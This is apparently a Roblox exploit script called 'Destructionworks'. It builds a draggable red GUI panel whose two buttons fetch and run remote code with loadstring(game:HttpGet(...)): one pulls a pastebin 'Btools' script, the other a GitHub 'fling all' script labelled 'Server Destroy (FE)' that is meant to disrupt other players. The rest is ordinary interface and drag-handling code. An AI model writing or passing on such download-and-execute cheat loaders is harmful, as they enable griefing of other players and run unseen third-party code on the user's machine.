-- Gui to Lua
-- Version: 3.2

-- Instances:

local ScreenGui = Instance.new("ScreenGui")
local main = Instance.new("Frame")
local UICorner = Instance.new("UICorner")
local UIGradient = Instance.new("UIGradient")
local title = Instance.new("TextLabel")
local btools = Instance.new("ImageButton")
local btoolstext = Instance.new("TextLabel")
local killall = Instance.new("TextButton")
local close = Instance.new("TextButton")
local UICorner_2 = Instance.new("UICorner")

--Properties:

ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

main.Name = "main"
main.Parent = ScreenGui
main.BackgroundColor3 = Color3.fromRGB(88, 0, 1)
main.BorderColor3 = Color3.fromRGB(0, 0, 0)
main.BorderSizePixel = 0
main.Position = UDim2.new(0.493040293, 0, 0.284119099, 0)
main.Size = UDim2.new(0, 277, 0, 325)

UICorner.Parent = main

UIGradient.Color = ColorSequence.new{ColorSequenceKeypoint.new(0.00, Color3.fromRGB(255, 0, 4)), ColorSequenceKeypoint.new(0.04, Color3.fromRGB(255, 9, 13)), ColorSequenceKeypoint.new(0.18, Color3.fromRGB(150, 3, 5)), ColorSequenceKeypoint.new(0.33, Color3.fromRGB(93, 0, 2)), ColorSequenceKeypoint.new(0.46, Color3.fromRGB(255, 124, 126)), ColorSequenceKeypoint.new(0.57, Color3.fromRGB(255, 175, 176)), ColorSequenceKeypoint.new(0.66, Color3.fromRGB(125, 1, 4)), ColorSequenceKeypoint.new(0.73, Color3.fromRGB(174, 92, 93)), ColorSequenceKeypoint.new(0.73, Color3.fromRGB(255, 197, 197)), ColorSequenceKeypoint.new(0.74, Color3.fromRGB(255, 209, 209)), ColorSequenceKeypoint.new(0.80, Color3.fromRGB(255, 200, 201)), ColorSequenceKeypoint.new(0.80, Color3.fromRGB(255, 208, 209)), ColorSequenceKeypoint.new(0.80, Color3.fromRGB(140, 2, 5)), ColorSequenceKeypoint.new(0.81, Color3.fromRGB(107, 0, 2)), ColorSequenceKeypoint.new(0.85, Color3.fromRGB(243, 0, 4)), ColorSequenceKeypoint.new(0.85, Color3.fromRGB(255, 212, 213)), ColorSequenceKeypoint.new(0.87, Color3.fromRGB(111, 1, 3)), ColorSequenceKeypoint.new(0.90, Color3.fromRGB(117, 0, 2)), ColorSequenceKeypoint.new(0.94, Color3.fromRGB(199, 0, 7)), ColorSequenceKeypoint.new(1.00, Color3.fromRGB(117, 0, 2))}
UIGradient.Parent = main

title.Name = "title"
title.Parent = main
title.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
title.BackgroundTransparency = 1.000
title.BorderColor3 = Color3.fromRGB(0, 0, 0)
title.BorderSizePixel = 0
title.Position = UDim2.new(0.0216606501, 0, 0, 0)
title.Size = UDim2.new(0, 260, 0, 52)
title.Font = Enum.Font.Unknown
title.Text = "Destructionworks"
title.TextColor3 = Color3.fromRGB(255, 0, 4)
title.TextScaled = true
title.TextSize = 40.000
title.TextWrapped = true

btools.Name = "btools"
btools.Parent = main
btools.BackgroundColor3 = Color3.fromRGB(71, 0, 1)
btools.BorderColor3 = Color3.fromRGB(0, 0, 0)
btools.BorderSizePixel = 0
btools.Position = UDim2.new(0.0722021684, 0, 0.704615414, 0)
btools.Size = UDim2.new(0, 236, 0, 81)
btools.Image = "http://www.roblox.com/asset/?id=14808588"
btools.MouseButton1Down:connect(function()
	loadstring(game:HttpGet("https://pastebin.com/raw/FBKJTUyw"))();
end)

btoolstext.Name = "btoolstext"
btoolstext.Parent = main
btoolstext.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
btoolstext.BackgroundTransparency = 1.000
btoolstext.BorderColor3 = Color3.fromRGB(0, 0, 0)
btoolstext.BorderSizePixel = 0
btoolstext.Position = UDim2.new(0.0613718405, 0, 0.563076913, 0)
btoolstext.Size = UDim2.new(0, 237, 0, 32)
btoolstext.Font = Enum.Font.Unknown
btoolstext.Text = "Btools (CLIENT):"
btoolstext.TextColor3 = Color3.fromRGB(255, 0, 4)
btoolstext.TextScaled = true
btoolstext.TextSize = 40.000
btoolstext.TextWrapped = true

killall.Name = "killall"
killall.Parent = main
killall.BackgroundColor3 = Color3.fromRGB(71, 0, 1)
killall.BorderColor3 = Color3.fromRGB(0, 0, 0)
killall.BorderSizePixel = 0
killall.Position = UDim2.new(0.0613718405, 0, 0.252307683, 0)
killall.Size = UDim2.new(0, 236, 0, 89)
killall.Font = Enum.Font.SourceSans
killall.Text = "Server Destroy (FE)"
killall.TextColor3 = Color3.fromRGB(255, 0, 4)
killall.TextScaled = true
killall.TextSize = 14.000
killall.TextWrapped = true
killall.MouseButton1Down:connect(function()
	loadstring(game:HttpGet('https://raw.githubusercontent.com/g00bysmasher/fling/main/fling%20all',true))()
end)

close.Name = "close"
close.Parent = main
close.BackgroundColor3 = Color3.fromRGB(79, 0, 1)
close.BorderColor3 = Color3.fromRGB(0, 0, 0)
close.BorderSizePixel = 0
close.Position = UDim2.new(0.779783368, 0, -0.0984615386, 0)
close.Size = UDim2.new(0, 61, 0, 42)
close.ZIndex = 2
close.Font = Enum.Font.SourceSans
close.Text = "X"
close.TextColor3 = Color3.fromRGB(0, 0, 0)
close.TextScaled = true
close.TextSize = 14.000
close.TextWrapped = true
close.MouseButton1Down:connect(function()
	main.Visible = false
end)

UICorner_2.Parent = close

-- Scripts:

local function KNELT_fake_script() -- main.Dragify 
	local script = Instance.new('LocalScript', main)

	local userInputService : UserInputService = game:GetService("UserInputService") -- UserInputService
	local tweenService : TweenService = game:GetService("TweenService") -- Tweenservice
	local dragToggle : boolean = nil -- Toggle?
	local dragObject : GuiObject = script.Parent -- Object Being Dragged
	local dragInput : InputObject = nil -- Input On The Drag Object
	local dragStart : Vector2 = nil -- Starting Position
	local dragInfo : TweenInfo = TweenInfo.new(0.15) -- Drag Speed
	local dragPos : UDim2 = nil -- Drag Pos
	
	local updateInput = function(input) -- Updates Input
		local delta : Vector2 = input.Position - dragStart
		local position : UDim2 = UDim2.new(dragPos.X.Scale, dragPos.X.Offset + delta.X, dragPos.Y.Scale, dragPos.Y.Offset + delta.Y)
		tweenService:Create(dragObject, dragInfo, {Position = position}):Play()
	end
	
	local dragInputBegan = function(input: InputObject) 
		if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) and userInputService:GetFocusedTextBox() == nil then
			dragToggle = true
			dragStart = input.Position
			dragPos = dragObject.Position
			input.Changed:Connect(function()
				if input.UserInputState == Enum.UserInputState.End then
					dragToggle = false
				end
			end)
		end
	end
	
	local dragInputChanged = function(input: InputObject)
		if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
			dragInput = input
		end
	end
	
	local userInputChanged = function(input: InputObject, gameProcessedEvent: boolean)
		if input == dragInput and dragToggle then
			updateInput(input) -- Calls The Update Input Function With The Provided Input Object
		end
	end
	
	dragObject.InputBegan:Connect(dragInputBegan) -- Drag Object's Input Begins and calls this function
	dragObject.InputChanged:Connect(dragInputChanged) -- Drag Object's Input Changes and calls this function
	userInputService.InputChanged:Connect(userInputChanged) -- Users Input Changes and calls this function
	
	
end
coroutine.wrap(KNELT_fake_script)()
